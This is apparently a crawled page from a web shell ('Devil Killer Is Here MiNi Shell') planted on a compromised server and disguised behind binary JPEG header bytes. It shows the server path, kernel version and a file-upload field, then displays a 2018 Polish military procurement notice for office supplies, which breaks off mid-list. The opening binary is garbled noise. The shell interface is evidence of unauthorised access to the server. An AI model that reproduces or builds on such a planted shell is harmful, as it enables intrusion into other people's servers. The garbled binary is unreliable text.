JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20180529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20180529/565073-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 565073-N-2018 z dnia 2018-05-29 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">1. Baza Lotnictwa Transportowego</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa materiałów i artykułów biurowych</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">1. Baza Lotnictwa Transportowego</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">1008894930000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Żwirki i Wigury</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1c</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">00-909 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Warszawa</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">261 821 316, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">1bltr.zampubliczne@ron.mil.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">261 821 316</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.1bltr.wp.mil.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">1. Baza Lotnictwa Transportowego</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://1bltr.wp.mil.pl/pl/index.html</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja"></span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Nie</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny"></span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres"></span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa materiałów i artykułów biurowych</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">13/2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci"></span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Bloczek samoprzylepny 50x40 mm, kolor karteczek żółty z nałożonym klejem umożliwiającym wielokrotne przyklejanie i odlepianie karteczek do różnych powierzchni, 3 szt. w opakowaniu.500	szt.Bloczek samoprzylepny kostka, usuwalne, w bloczku 100 kartek o wymiarach 76x76 mm, ilość karteczek 100 szt.450	szt.Bloczek samoprzylepny kostka, usuwalne, w bloczku 100 kartek o wymiarach 76x76 mm, ilość karteczek 100 szt., kateczki złączone w harmonijkę po wyciągnięciu jednej karteczki z pojemnika kolejne wysuwają się automatycznie.350	szt.Blok szkolny z kartkami w kratkę, format A4, ilość kartek 50, klejony u góry	200szt.Blok techniczny A3/10, kartki o gramaturze min. 200 g/m2 200	szt.Brulion w twardej oprawie, ilośc kartek: 160 w kratkę, format B5, wzmocniony grzbiet i laminowaną okładkę, kartki o gramaturze min. 60 g/m2 200szt.Cienkopis z fibrową końcówką oprawioną w metal, wypełniony tuszem, szerokość linii pisania do 0,5 mm, nazwa producenta oraz typ podany na obudowie (kpl. 4 kolory) w etui.200	szt.Cienkopis z tuszem piszącym po wszystkich rodzajach papieru, posiadający gumowy, ergonomiczny uchwyt zapewniający komfort w trakcie pisania, posiadający klip, grubość linii pisania 0,25 mm, kolor tuszu czerwony 50szt.Cienkopis z tuszem piszącym po wszystkich rodzajach papieru, posiadający gumowy, ergonomiczny uchwyt zapewniający komfort w trakcie pisania, posiadający klip, grubość linii pisania 0,25 mm, kolor tuszu czarny	200	szt.Cienkopis z tuszem piszącym po wszystkich rodzajach papieru, posiadający gumowy, ergonomiczny uchwyt zapewniający komfort w trakcie pisania, posiadający klip, grubość linii pisania 0,25 mm, kolor tuszu niebieski	500	szt.Cienkopis, kolor czarny, grubość linii pisania 0,3 mm, tusz odporny na światło i wodę, końcówka z metalową osłoną, umożliwiający rysowanie z linijką i szablonem. 200	szt.Czyszcik magnetyczny z filcowymi wkładami przyczepianymi na rzep.	60	kpl.Datownik, wysokość daty 4 mm, wkład tuszujący jeden kolor, nazwy/skróty miesięcy w języku polskim.	150	szt.Długopis automatyczny z wymiennym wkładem olejowym, wodoodpornym, szerokość/grubość linii pisnia do 0,3 mm, długość linii pisania min. 1100 m, z mechanizmem chowania wkładu, z gumowym uchwytem , kolor tuszu czarny.	500	szt.Długopis automatyczny z wymiennym wkładem olejowym, wodoodpornym, szerokość/grubość linii pisnia do 0,3 mm, długość linii pisania min. 1100 m, z mechanizmem chowania wkładu, z gumowym uchwytem , kolor tuszu niebieski.	700	szt.Długopis automatyczny z wymiennym wkładem olejowym, wodoodpornym, szerokość,grubość linii pisnia do 0,3 mm, długość linii pisania min. 1100 m, z mechanizmem chowania wkładu, z gumowym uchwytem , kolor tuszu czerwony.	200	szt.Długopis automatyczny z wymiennym wkładem olejowym, wodoodpornym, szerokość,grubość linii pisnia do 0,3 mm, długość linii pisania min. 1100 m, z mechanizmem chowania wkładu, z gumowym uchwytem , kolor tuszu zielony.	150	szt.Długopis na łańcuszku, z wymiennym wkładem, długość linii pisania min. 3000 m, wkład niebieski.	50	szt.Długopis żelowy z wymiennym wkładem, w przezroczystej obudowie z ergonomicznym, wygodnym uchwytem, z metalową końcówką ze stali nierdzewnej, szerokość linii pisania do 0,3 mm, długość linii pisania min. 1000 m., wkład czarny.	150	szt.Długopis żelowy z wymiennym wkładem, w przezroczystej obudowie z ergonomicznym, wygodnym uchwytem, z metalową końcówką ze stali nierdzewnej, szerokość linii pisania do 0,3 mm, długość linii pisania min. 1000 m., wkład niebieski.	200	szt.Długopis żelowy z wymiennym wkładem, w przezroczystej obudowie z ergonomicznym, wygodnym uchwytem, z metalową końcówką ze stali nierdzewnej, szerokość linii pisania do 0,3 mm, długość linii pisania min. 1000 m., wkład czerwony.	200	szt.Falamastry, końcówka z włókna o średnicy 1,7-1,8 mm +/-0,2mm, grubość linii pisania 1mm odporna na wysychania, komplet 4 kolory, w fabrycznym etui.	50	kpl.Flamastry, końcówka z włókna o średnicy 1,7-1,8 mm +/-0,2mm, grubość linii pisania 1mm odporna na wysychania, komplet 6 kolory, w fabrycznym etui.	130	op.Flamaster czarny permanentny, grubość linii pisania 1 mm, typ końcówki okrągły.	50	szt.Folia do drukarek atramentowych format A4 bezbarwna, grubość do 100 mic.(opak. 50 szt.)	30	pac.Folia przezroczysta, samoprzylepna, format A4, umożliwiająca wydruk z drukarki laserowej i ksero, folia o grubości do 100 mic na podłożu poliesterowym (op. 100 szt.)	20	op.Folia do laminowania na gorąco, A5, grubość 100-150 mic, obustronnie przezroczysta (op. 100 szt.)	30	pac.Folia do laminowania na gorąco A4, grubość 100 mic., obustronnie matowa, (op. 100 szt.)	50	op.Folia do laminowania A4, grubość 80 mic., błyszcząca, ilość w opakowaniu 100 szt.	40	op.Listwy do oprawy dokumentów formatu A4, dwa rogi zaokrąglone, grubość wypełnienia do 30 kartek, op. 100 szt., kolor ciemno niebieski.	40	op.Listwy do oprawy dokumentów formatu A4, dwa rogi zaokrąglone, grubość wypełnienia do 60 kartek, op. 100 szt., kolor ciemno niebieski.	40	op.Podkład na biurko - kalendarz biuwar o wymiarach 590x395 mm (długość +/- 4mm; szerokość +/- 25mm), posiadający dwuletni nadruk (2018/2019), plan tygodnia oraz dużo miejsca na notatki. 100	szt.Kalka ołówkowa z woskiem A4, gramatura min. - 18 gsm kalka, min. 10 gsm tusz, op. 50 szt.	50	op.Kalka techniczna A4 o gramaturze min. 90 g/m2, doskonała przezroczystość, gładkie wykończenie, umożliwia kreślenie ołówkiem, tuszem i pisakiem (op. 10 ark.)	300	pac.Kartki samoprzylepne, usuwalne, w komplecie 4 różnokolorowe bloczki po 50 kartek każdego koloru , o gramaturze 75 g/m2, o wymiarach 20x50 mm	460	szt.Klej w sztyfcie 40g, wysokiej jakości bez rozpuszczalników, do klejenia papieru,kartonu, z zamknięceim zabezpieczającym przed wyschnięciem i mechanizmem powodującym wysuwanie się sztyftu z klejem.	50	szt.klej introligatorski, pojemność 40-60 ml, łączący wszelkiego rodzaju papiery, drewna, tkaniny, folii.	20	kg.Klej wikol w tubie, poj. min. 45 ml, łączący drewno, papier, tekturę, tkaniny.	80	szt.Plastikowy klips archiwizacyjny na zaczep umożliwiający łatwe przeniesienie i przechowywanie dokumentów, wykonany z wysokogatunkowego polipropylenu, długość wąsów archiwizacyjnych min. 100 mm+/- 1mm, standardowe rozstawienie wąsów 80 mm +/-5mm, umożliwiający archiwizowanie dokumentów o grubości 7 cm, nadający się do wielokrotnego użytku, trwały 50 lat, posiadający system zapinania (zamek) zabezpieczający przed otwieraniem, odporny na niskie temperatury powodujące pogorszenie cech użytkowych. Opakowanie 50 szt.	30	op.Kołonotatnik, format A5, w twardej laminowanej lub lakierowanej okładce, gramatura papieru min. 80g/m2, 80-cio kartkowy w kratkę.	70	szt.Koperta B6, biała, wykonana z papieru o gramaturze min. 90 g/m2, samoklejąca z paskiem (op. 1000 szt.)	20	op.Korektor w taśmie, w przezroczystej obudowie, z ruchowym mechanizmem zabezpieczająvcym taśme przed uszkodzeniem, szerokość taśmy 4,2 mm-5 mm, dł. min. 14 m	300	szt.Korektor w kształcie pióra, ścienką piszącą metalową końcówką, pojemność min. 9 ml.	200	szt.Koszulki na dokumenty A4, antyelektrostatyczne, z harmonijkowym brzegiem i dnem, wykonane z przeroczystej folii propylenowej o grubości min. 170 mic, mieszczące min. 200 kartek o gramaturze 80g/m2, zamykane od góry klapką, specjalnie wzmocniony perforowany brzeg (op. 5 szt.)	80	op.Kredki grube, w okrągłej drewnianej oprawie, długość kredki min. 15 cm , wkład o grubości 4 mm (+/-2 mm), komplet 6 kolorów.	100	op.Linijka 100 cm z anodowanego aluminium, z jedną skalą cm, z nadrukowaną podziałką (mm),z wskładką antypoślizgową pod spodem.	40	szt.Linijka 30 cm z anodowanego aluminium, z dwoma skalami, z nadrukowaną podziałką (mm).	60	szt.Linijka 50 cm z anodowanego aluminium, z jedną skalą, z nadrukowaną podziałką (mm)	80	szt.Linijka 30 cm z anodowanego aluminium, z dwoma skalami, z nadrukowaną podziałką (mm), z wskładką antypoślizgową pod spodem, z uchwytem	60	szt.Linijka 100 cm z przezroczystego plastiku lub plexi, z nieścieralną podziałką, podciętymi brzegami umożliwiającymi precyzyjne kreślenie.	40	szt.Linijka 30 cm z przezroczystego plastiku lub plexi, z nieścieralną podziałką, podciętymi brzegami umołżiwiającymi precyzyjne kreślenie.	70	szt.Listwa plastikowa wsuwana z jedną zaokrągloną końcówką umożliwiająca oprawę min. 40 kartek A4, kolor listwy niebieski, w opak. 50 szt.	90	op.Magnesy do tablic magnetycznych nie rysującej powierzchni magnetycznej o średnicy 20 mm +/- 1 mm, w opak. 10 szt. mix kolorów.	80	op.Marker permanentny z okrągłą końcówką, szerokość linii pisania 1-3 mm, tusz na bazie alkoholu, kolor czerwony.	60	szt.Marker permanentny z okrągłą końcówką, szerokość linii pisania 1-3 mm, tusz na bazie alkoholu, kolor niebieski.	110	szt.Marker permanentny z okrągłą końcówką, szerokość linii pisania 1-3 mm, tusz na bazie alkoholu, kolor zielony.	130	szt.Marker pernamentny, piszący na papierze, skórze, plastiku i metalu, z tuszem na bazie alkoholu odpornym na wodę ze ścientą końcówą, szerokość linii pisania 1-5mm, kolor czarny	120	szt.Marker pernamentny, piszący na papierze, skórze, plastiku i metalu, z tuszem na bazie alkoholu odpornym na wodę, ze ścientą końcówą, szerokość linii pisania 1-5mm, kolor czerwony	60	szt.Marker pernamentny, piszący na papierze, skórze, plastiku i metalu, z tuszem na bazie alkoholu odpornym na wodę, ze ścientą końcówą, szerokość linii pisania 1-5mm, kolor zielony	100	szt.Pisak do tablic suchościeralnych z okrągłą końcówką, z płynnym tuszem dozowanym za pomocą specjalnej pompki, długość linii pisania min. 850 m, grubość końcówki do 6 mm (kpl. 4 kolory), w zestawie z gąbką.	50	op.karteczki kolorowe klejone o wymiarach 85x85x40 mm (+/-5mm dla wysokości), 5 pastelowych kolorów w kostce, każda kostka w foli ochronnej.	200	szt.Nożyczki biurowe długość 160 mm, rączki plastikowe	70	szt.Nóż do kopert ze stali nierdzewnej, rozmiar 16-19 cm	30	szt.Nóż z ostrzem łamanym 18mm, korpus wykonany ze stali nierdzewnej pokryty miękkim tworzywem, posiadający blokadę ostrza.	100	szt.Numerator automatycznie pieczętujący na dokumentach kolejne liczby, posiadający sześć pierścieni z cyframi od 0 do 9. Wysokość czcionki pieczętującej 4 mm +/- 1 mm, czarna tuszownica, metalowa czcionka.	40	szt.Ofertówka sztywna A4, przód i tył z przezoczystej folii PVC, posiadająca wycięcie na palec oraz zaokrąglony prawy górny róg (opak. 25 szt.)	15	op.Folia do bindowania format A4, przezroczysta, grubość 200 mic., ilość arkuszy w opakowaniu 100 szt.	20	pac.Okładka kartonowa do bindowania w formacie A4, kolor granatowy lub niebieski, ilość 100 szt. w opakowaniu.	50	op.Okładka do bindowania termicznego, format A4, umożliwiająca oprawę 30 kartek, ilość w opak. 100 szt.	30	szt.Ołówek z gumką, wykonany z żywicy syntetycznej, plastyczny, twardość HB, nazwa producenta, twardość podana na korpusie.	220	szt.Ołówek drewniany z gumką, twardość HB, nazwa producenta, twardość podana na korpusie.	160	szt.Papier samoprzylepny Biały A3, matowy, ilość w opakowaniu 100 arkuszy, do drukarek atramentowych i laserowych.	170	op.Papier samoprzylepny A4 Biały, format A4, ilośc w opakowaniu 100 ark., do drukarek laserowych i atramentowych.	380	op.Papier samoprzylepny A4 czerwony, w opakowaniu min. 20 ark., do drukarek laserowych i atramentowych, gramatura min. 80g/m2	40	op.Papier samoprzylepny B2 czerwony, gramatura 80g.	60	szt.Papier samoprzylepny B2 niebieski, gramatura 80g.	100	szt.Papier samoprzylepny A4 zielony, w opakowaniu min. 20 ark., do drukarek laserowych i atramentowych, gramatura min. 80g/m2	30	op.Papier samoprzylepny A4 żółty, w opakowaniu min. 20 ark., do drukarek laserowych i atramentowych, gramatura min. 80g/m2	30	op.Automatyczna pieczątka posiadająca klapkę 